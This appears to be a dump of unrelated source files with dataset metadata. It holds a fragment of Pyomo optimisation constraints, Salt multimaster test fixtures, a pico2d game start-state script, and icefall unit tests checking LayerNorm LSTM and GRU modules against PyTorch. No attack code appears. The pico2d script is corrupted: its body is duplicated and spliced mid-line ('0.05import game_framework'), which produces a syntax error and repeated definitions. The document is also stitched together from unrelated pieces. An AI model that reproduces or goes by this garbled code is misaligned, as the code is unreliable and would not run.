m.c278 = Constraint(expr= m.x287 + m.x288 + m.x289 + m.x290 + m.x291 + m.x292 + m.x293 + m.x294 + m.x295 + m.x296
+ m.x297 + m.x298 + m.x299 - 203*m.b569 <= 0)
m.c279 = Constraint(expr= m.x300 + m.x301 + m.x302 + m.x303 + m.x304 + m.x305 + m.x306 + m.x307 + m.x308 + m.x309
+ m.x310 + m.x311 + m.x312 - 284*m.b570 <= 0)
m.c280 = Constraint(expr= m.x313 + m.x314 + m.x315 + m.x316 + m.x317 + m.x318 + m.x319 + m.x320 + m.x321 + m.x322
+ m.x323 + m.x324 + m.x325 - 426*m.b571 <= 0)
m.c281 = Constraint(expr= m.x326 + m.x327 + m.x328 + m.x329 + m.x330 + m.x331 + m.x332 + m.x333 + m.x334 + m.x335
+ m.x336 + m.x337 + m.x338 - 284*m.b572 <= 0)
m.c282 = Constraint(expr= m.x339 + m.x340 + m.x341 + m.x342 + m.x343 + m.x344 + m.x345 + m.x346 + m.x347 + m.x348
+ m.x349 + m.x350 + m.x351 - 109*m.b573 <= 0)
m.c283 = Constraint(expr= m.x352 + m.x353 + m.x354 + m.x355 + m.x356 + m.x357 + m.x358 + m.x359 + m.x360 + m.x361
+ m.x362 + m.x363 + m.x364 - 309*m.b574 <= 0)
m.c284 = Constraint(expr= m.x365 + m.x366 + m.x367 + m.x368 + m.x369 + m.x370 + m.x371 + m.x372 + m.x373 + m.x374
+ m.x375 + m.x376 + m.x377 - 434*m.b575 <= 0)
m.c285 = Constraint(expr= m.x378 + m.x379 + m.x380 + m.x381 + m.x382 + m.x383 + m.x384 + m.x385 + m.x386 + m.x387
+ m.x388 + m.x389 + m.x390 - 141*m.b576 <= 0)
m.c286 = Constraint(expr= m.x391 + m.x392 + m.x393 + m.x394 + m.x395 + m.x396 + m.x397 + m.x398 + m.x399 + m.x400
+ m.x401 + m.x402 + m.x403 - 434*m.b577 <= 0)
m.c287 = Constraint(expr= m.x404 + m.x405 + m.x406 + m.x407 + m.x408 + m.x409 + m.x410 + m.x411 + m.x412 + m.x413
+ m.x414 + m.x415 + m.x416 - 403*m.b578 <= 0)
m.c288 = Constraint(expr= m.x417 + m.x418 + m.x419 + m.x420 + m.x421 + m.x422 + m.x423 + m.x424 + m.x425 + m.x426
+ m.x427 + m.x428 + m.x429 - 426*m.b579 <= 0)
m.c289 = Constraint(expr= m.x430 + m.x431 + m.x432 + m.x433 + m.x434 + m.x435 + m.x436 + m.x437 + m.x438 + m.x439
+ m.x440 + m.x441 + m.x442 - 403*m.b580 <= 0)
m.c290 = Constraint(expr= m.x443 + m.x444 + m.x445 + m.x446 + m.x447 + m.x448 + m.x449 + m.x450 + m.x451 + m.x452
+ m.x453 + m.x454 + m.x455 - 151*m.b581 <= 0)
m.c291 = Constraint(expr= m.x456 + m.x457 + m.x458 + m.x459 + m.x460 + m.x461 + m.x462 + m.x463 + m.x464 + m.x465
+ m.x466 + m.x467 + m.x468 - 233*m.b582 <= 0)
m.c292 = Constraint(expr= m.x469 + m.x470 + m.x471 + m.x472 + m.x473 + m.x474 + m.x475 + m.x476 + m.x477 + m.x478
+ m.x479 + m.x480 + m.x481 - 109*m.b583 <= 0)
m.c293 = Constraint(expr= m.x482 + m.x483 + m.x484 + m.x485 + m.x486 + m.x487 + m.x488 + m.x489 + m.x490 + m.x491
+ m.x492 + m.x493 + m.x494 - 367*m.b584 <= 0)
m.c294 = Constraint(expr= m.x495 + m.x496 + m.x497 + m.x498 + m.x499 + m.x500 + m.x501 + m.x502 + m.x503 + m.x504
+ m.x505 + m.x506 + m.x507 - 367*m.b585 <= 0)
m.c295 = Constraint(expr= m.x508 + m.x509 + m.x510 + m.x511 + m.x512 + m.x513 + m.x514 + m.x515 + m.x516 + m.x517
+ m.x518 + m.x519 + m.x520 - 382*m.b586 <= 0)
m.c296 = Constraint(expr= m.x521 + m.x522 + m.x523 + m.x524 + m.x525 + m.x526 + m.x527 + m.x528 + m.x529 + m.x530
+ m.x531 + m.x532 + m.x533 - 151*m.b587 <= 0)
m.c297 = Constraint(expr= m.x534 + m.x535 + m.x536 + m.x537 + m.x538 + m.x539 + m.x540 + m.x541 + m.x542 + m.x543
+ m.x544 + m.x545 + m.x546 - 382*m.b588 <= 0)
| 53.085288 | 120 | 0.629634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 699 | 0.009359 |
c7d378679d5e763e0a3427a5a59048ba70934d41 | 4,322 | py | Python | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | import logging
import os
import shutil
import subprocess
import pytest
import salt.utils.platform
log = logging.getLogger(__name__)
@pytest.fixture(scope="package", autouse=True)
def skip_on_tcp_transport(request):
if request.config.getoption("--transport") == "tcp":
pytest.skip("Multimaster under the TPC transport is not working. See #59053")
@pytest.fixture(scope="package")
def salt_mm_master_1(request, salt_factories):
config_defaults = {
"open_mode": True,
"transport": request.config.getoption("--transport"),
}
config_overrides = {
"interface": "127.0.0.1",
}
factory = salt_factories.salt_master_daemon(
"mm-master-1",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def mm_master_1_salt_cli(salt_mm_master_1):
return salt_mm_master_1.get_salt_cli(timeout=120)
@pytest.fixture(scope="package")
def salt_mm_master_2(salt_factories, salt_mm_master_1):
if salt.utils.platform.is_darwin() or salt.utils.platform.is_freebsd():
subprocess.check_output(["ifconfig", "lo0", "alias", "127.0.0.2", "up"])
config_defaults = {
"open_mode": True,
"transport": salt_mm_master_1.config["transport"],
}
config_overrides = {
"interface": "127.0.0.2",
}
# Use the same ports for both masters, they are binding to different interfaces
for key in (
"ret_port",
"publish_port",
):
config_overrides[key] = salt_mm_master_1.config[key]
factory = salt_factories.salt_master_daemon(
"mm-master-2",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
# The secondary salt master depends on the primarily salt master fixture
# because we need to clone the keys
for keyfile in ("master.pem", "master.pub"):
shutil.copyfile(
os.path.join(salt_mm_master_1.config["pki_dir"], keyfile),
os.path.join(factory.config["pki_dir"], keyfile),
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def mm_master_2_salt_cli(salt_mm_master_2):
return salt_mm_master_2.get_salt_cli(timeout=120)
@pytest.fixture(scope="package")
def salt_mm_minion_1(salt_mm_master_1, salt_mm_master_2):
config_defaults = {
"transport": salt_mm_master_1.config["transport"],
}
mm_master_1_port = salt_mm_master_1.config["ret_port"]
mm_master_1_addr = salt_mm_master_1.config["interface"]
mm_master_2_port = salt_mm_master_2.config["ret_port"]
mm_master_2_addr = salt_mm_master_2.config["interface"]
config_overrides = {
"master": [
"{}:{}".format(mm_master_1_addr, mm_master_1_port),
"{}:{}".format(mm_master_2_addr, mm_master_2_port),
],
"test.foo": "baz",
}
factory = salt_mm_master_1.salt_minion_daemon(
"mm-minion-1",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def salt_mm_minion_2(salt_mm_master_1, salt_mm_master_2):
config_defaults = {
"transport": salt_mm_master_1.config["transport"],
}
mm_master_1_port = salt_mm_master_1.config["ret_port"]
mm_master_1_addr = salt_mm_master_1.config["interface"]
mm_master_2_port = salt_mm_master_2.config["ret_port"]
mm_master_2_addr = salt_mm_master_2.config["interface"]
config_overrides = {
"master": [
"{}:{}".format(mm_master_1_addr, mm_master_1_port),
"{}:{}".format(mm_master_2_addr, mm_master_2_port),
],
"test.foo": "baz",
}
factory = salt_mm_master_2.salt_minion_daemon(
"mm-minion-2",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
| 31.547445 | 85 | 0.679084 | 0 | 0 | 3,550 | 0.821379 | 4,167 | 0.964137 | 0 | 0 | 876 | 0.202684 |
c7d37af76275d31df153580818ea0db96b86762e | 1,210 | py | Python | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | import game_framework
from pico2d import *
import title_state
name = "StartState"
image = None
logo_time = 0.0
def enter():
global image
image = load_image('kpu_credit.png')
def exit():
global image
del(image)
def update():
global logo_time
if (logo_time > 1.0):
logo_time = 0.8
game_framework.change_state(title_state)
delay(0.01)
logo_time += 0.05import game_framework
from pico2d import *
import title_state
name = "StartState"
image = None
logo_time = 0.0
def enter():
global image
image = load_image('kpu_credit.png')
def exit():
global image
del(image)
def update():
global logo_time
if (logo_time > 1.0):
logo_time = 0.8
game_framework.change_state(title_state)
delay(0.01)
logo_time += 0.05
def draw():
global image
clear_canvas()
image.draw(400,300)
update_canvas()
def handle_events():
events = get_events()
pass
def pause(): pass
def resume(): pass
def draw():
global image
clear_canvas()
image.draw(400,300)
update_canvas()
def handle_events():
events = get_events()
pass
def pause(): pass
def resume(): pass
| 11.747573 | 48 | 0.634711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.046281 |
c7d524f7dbf8736dbbb40f3bb15a61c60aba8191 | 22,620 | py | Python | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# Copyright 2021 Xiaomi Corp. (authors: Fangjun Kuang)
#
# See ../../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from transducer.rnn import (
LayerNormGRU,
LayerNormGRUCell,
LayerNormGRULayer,
LayerNormLSTM,
LayerNormLSTMCell,
LayerNormLSTMLayer,
)
def get_devices():
devices = [torch.device("cpu")]
if torch.cuda.is_available():
devices.append(torch.device("cuda", 0))
return devices
def assert_allclose(a: torch.Tensor, b: torch.Tensor, atol=1e-6, **kwargs):
assert torch.allclose(
a, b, atol=atol, **kwargs
), f"{(a - b).abs().max()}, {a.numel()}"
def test_layernorm_lstm_cell_jit(device="cpu"):
input_size = 10
hidden_size = 20
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
cell = LayerNormLSTMCell(
input_size=input_size,
hidden_size=hidden_size,
bias=bias,
device=device,
)
torch.jit.script(cell)
def test_layernorm_lstm_cell_constructor(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
ln=nn.Identity,
device=device,
)
torch_cell = nn.LSTMCell(
input_size,
hidden_size,
).to(device)
for name, param in self_cell.named_parameters():
assert param.shape == getattr(torch_cell, name).shape
assert len(self_cell.state_dict()) == len(torch_cell.state_dict())
def test_layernorm_lstm_cell_with_projection_jit(device="cpu"):
input_size = 10
hidden_size = 20
proj_size = 5
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
proj_size=proj_size,
device=device,
)
torch.jit.script(self_cell)
def test_layernorm_lstm_cell_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_cell = nn.LSTMCell(
input_size,
hidden_size,
bias=bias,
).to(device)
with torch.no_grad():
for name, torch_param in torch_cell.named_parameters():
self_param = getattr(self_cell, name)
torch_param.copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h, self_c = self_cell(x.clone(), (h, c))
torch_h, torch_c = torch_cell(x_clone, (h, c))
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_hc = self_h * self_c
torch_hc = torch_h * torch_c
(
self_hc.reshape(-1) * torch.arange(self_hc.numel(), device=device)
).sum().backward()
(
torch_hc.reshape(-1) * torch.arange(torch_hc.numel(), device=device)
).sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-3)
def test_layernorm_lstm_cell_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
proj_size=proj_size,
device=device,
)
torch_cell = nn.LSTM(
input_size,
hidden_size,
bias=bias,
proj_size=proj_size,
batch_first=True,
).to(device)
with torch.no_grad():
for name, self_param in self_cell.named_parameters():
getattr(torch_cell, f"{name}_l0").copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, proj_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h, self_c = self_cell(x.clone(), (h, c))
_, (torch_h, torch_c) = torch_cell(
x_clone.unsqueeze(1), (h.unsqueeze(0), c.unsqueeze(0))
)
torch_h = torch_h.squeeze(0)
torch_c = torch_c.squeeze(0)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
(self_h.sum() * self_c.sum()).backward()
(torch_h.sum() * torch_c.sum()).backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-5)
def test_layernorm_lstm_layer_jit(device="cpu"):
input_size = 10
hidden_size = 20
layer = LayerNormLSTMLayer(
input_size,
hidden_size=hidden_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_lstm_layer_with_project_jit(device="cpu"):
input_size = 10
hidden_size = 20
proj_size = 5
layer = LayerNormLSTMLayer(
input_size,
hidden_size=hidden_size,
proj_size=proj_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_lstm_layer_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
self_layer = LayerNormLSTMLayer(
input_size,
hidden_size,
bias=bias,
proj_size=proj_size,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, proj_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, (self_h, self_c) = self_layer(x, (h, c))
torch_layer = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
proj_size=proj_size,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, (torch_h, torch_c) = torch_layer(
x_clone, (h.unsqueeze(0), c.unsqueeze(0))
)
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_y.sum().backward()
torch_y.sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-5)
def test_layernorm_lstm_layer_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_layer = LayerNormLSTMLayer(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, (self_h, self_c) = self_layer(x, (h, c))
torch_layer = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, (torch_h, torch_c) = torch_layer(
x_clone, (h.unsqueeze(0), c.unsqueeze(0))
)
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_hc = self_h * self_c
torch_hc = torch_h * torch_c
self_hc_sum = (
self_hc.reshape(-1) * torch.arange(self_hc.numel(), device=device)
).sum()
torch_hc_sum = (
torch_hc.reshape(-1) * torch.arange(torch_hc.numel(), device=device)
).sum()
self_y_sum = (
self_y.reshape(-1) * torch.arange(self_y.numel(), device=device)
).sum()
torch_y_sum = (
torch_y.reshape(-1) * torch.arange(torch_y.numel(), device=device)
).sum()
(self_hc_sum + self_y_sum).backward()
(torch_hc_sum + torch_y_sum).backward()
assert_allclose(x.grad, x_clone.grad, atol=0.1)
def test_layernorm_lstm_jit(device="cpu"):
input_size = 2
hidden_size = 3
num_layers = 4
bias = True
lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch.jit.script(lstm)
def test_layernorm_lstm_with_projection_jit(device="cpu"):
input_size = 2
hidden_size = 5
proj_size = 3
num_layers = 4
bias = True
lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
proj_size=proj_size,
ln=nn.Identity,
device=device,
)
torch.jit.script(lstm)
def test_layernorm_lstm_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_lstm = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_lstm.state_dict()) == len(torch_lstm.state_dict())
with torch.no_grad():
for name, param in self_lstm.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_lstm, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
hs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
cs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
states = list(zip(hs, cs))
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_lstm(x, states)
h = torch.stack(hs)
c = torch.stack(cs)
torch_y, (torch_h, torch_c) = torch_lstm(x_clone, (h, c))
assert_allclose(self_y, torch_y)
self_h = torch.stack([s[0] for s in self_states])
self_c = torch.stack([s[1] for s in self_states])
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
shc_sum = s_sum + self_h.sum() + self_c.sum()
thc_sum = t_sum + torch_h.sum() + torch_c.sum()
shc_sum.backward()
thc_sum.backward()
assert_allclose(x.grad, x_clone.grad)
def test_layernorm_lstm_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
proj_size=proj_size,
ln=nn.Identity,
device=device,
)
torch_lstm = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
proj_size=proj_size,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_lstm.state_dict()) == len(torch_lstm.state_dict())
with torch.no_grad():
for name, param in self_lstm.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_lstm, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
hs = [torch.rand(N, proj_size, device=device) for _ in range(num_layers)]
cs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
states = list(zip(hs, cs))
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_lstm(x, states)
h = torch.stack(hs)
c = torch.stack(cs)
torch_y, (torch_h, torch_c) = torch_lstm(x_clone, (h, c))
assert_allclose(self_y, torch_y)
self_h = torch.stack([s[0] for s in self_states])
self_c = torch.stack([s[1] for s in self_states])
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
shc_sum = s_sum + self_h.sum() + self_c.sum()
thc_sum = t_sum + torch_h.sum() + torch_c.sum()
shc_sum.backward()
thc_sum.backward()
assert_allclose(x.grad, x_clone.grad)
def test_layernorm_gru_cell_jit(device="cpu"):
input_size = 10
hidden_size = 20
cell = LayerNormGRUCell(
input_size=input_size,
hidden_size=hidden_size,
bias=True,
device=device,
)
torch.jit.script(cell)
def test_layernorm_gru_cell_constructor(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
self_cell = LayerNormGRUCell(
input_size,
hidden_size,
ln=nn.Identity,
device=device,
)
torch_cell = nn.GRUCell(
input_size,
hidden_size,
).to(device)
for name, param in self_cell.named_parameters():
assert param.shape == getattr(torch_cell, name).shape
assert len(self_cell.state_dict()) == len(torch_cell.state_dict())
def test_layernorm_gru_cell_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_cell = LayerNormGRUCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_cell = nn.GRUCell(
input_size,
hidden_size,
bias=bias,
).to(device)
with torch.no_grad():
for name, torch_param in torch_cell.named_parameters():
self_param = getattr(self_cell, name)
torch_param.copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h = self_cell(x.clone(), h)
torch_h = torch_cell(x_clone, h)
assert_allclose(self_h, torch_h, atol=1e-5)
(
self_h.reshape(-1) * torch.arange(self_h.numel(), device=device)
).sum().backward()
(
torch_h.reshape(-1) * torch.arange(torch_h.numel(), device=device)
).sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-3)
def test_layernorm_gru_layer_jit(device="cpu"):
input_size = 10
hidden_size = 20
layer = LayerNormGRULayer(
input_size,
hidden_size=hidden_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_gru_layer_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_layer = LayerNormGRULayer(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, self_h = self_layer(x, h.clone())
torch_layer = nn.GRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, torch_h = torch_layer(x_clone, h.unsqueeze(0))
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
self_y_sum = (
self_y.reshape(-1) * torch.arange(self_y.numel(), device=device)
).sum()
torch_y_sum = (
torch_y.reshape(-1) * torch.arange(torch_y.numel(), device=device)
).sum()
self_y_sum.backward()
torch_y_sum.backward()
assert_allclose(x.grad, x_clone.grad, atol=0.1)
def test_layernorm_gru_jit(device="cpu"):
input_size = 2
hidden_size = 3
num_layers = 4
bias = True
gru = LayerNormGRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch.jit.script(gru)
def test_layernorm_gru_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_gru = LayerNormGRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_gru = nn.GRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_gru.state_dict()) == len(torch_gru.state_dict())
with torch.no_grad():
for name, param in self_gru.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_gru, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
states = [
torch.rand(N, hidden_size, device=device) for _ in range(num_layers)
]
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_gru(x, states)
torch_y, torch_states = torch_gru(x_clone, torch.stack(states))
assert_allclose(self_y, torch_y)
self_states = torch.stack(self_states)
assert_allclose(self_states, torch_states)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
s_state_sum = s_sum + self_states.sum()
t_state_sum = t_sum + torch_states.sum()
s_state_sum.backward()
t_state_sum.backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-2)
def _test_lstm(device):
test_layernorm_lstm_cell_jit(device)
test_layernorm_lstm_cell_constructor(device)
test_layernorm_lstm_cell_with_projection_jit(device)
test_layernorm_lstm_cell_forward(device)
test_layernorm_lstm_cell_with_projection_forward(device)
#
test_layernorm_lstm_layer_jit(device)
test_layernorm_lstm_layer_with_project_jit(device)
test_layernorm_lstm_layer_forward(device)
test_layernorm_lstm_layer_with_projection_forward(device)
test_layernorm_lstm_jit(device)
test_layernorm_lstm_with_projection_jit(device)
test_layernorm_lstm_forward(device)
test_layernorm_lstm_with_projection_forward(device)
def _test_gru(device):
test_layernorm_gru_cell_jit(device)
test_layernorm_gru_cell_constructor(device)
test_layernorm_gru_cell_forward(device)
#
test_layernorm_gru_layer_jit(device)
test_layernorm_gru_layer_forward(device)
#
test_layernorm_gru_jit(device)
test_layernorm_gru_forward(device)
torch.set_num_threads(1)
torch.set_num_interop_threads(1)
def main():
for device in get_devices():
print("device", device)
_test_lstm(device)
_test_gru(device)
if __name__ == "__main__":
torch.manual_seed(20211202)
main()
| 29.530026 | 79 | 0.642706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,128 | 0.049867 |
c7d594ecefc0ecfe585fc9557bf2ed8617f874e6 | 1,944 | py | Python | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
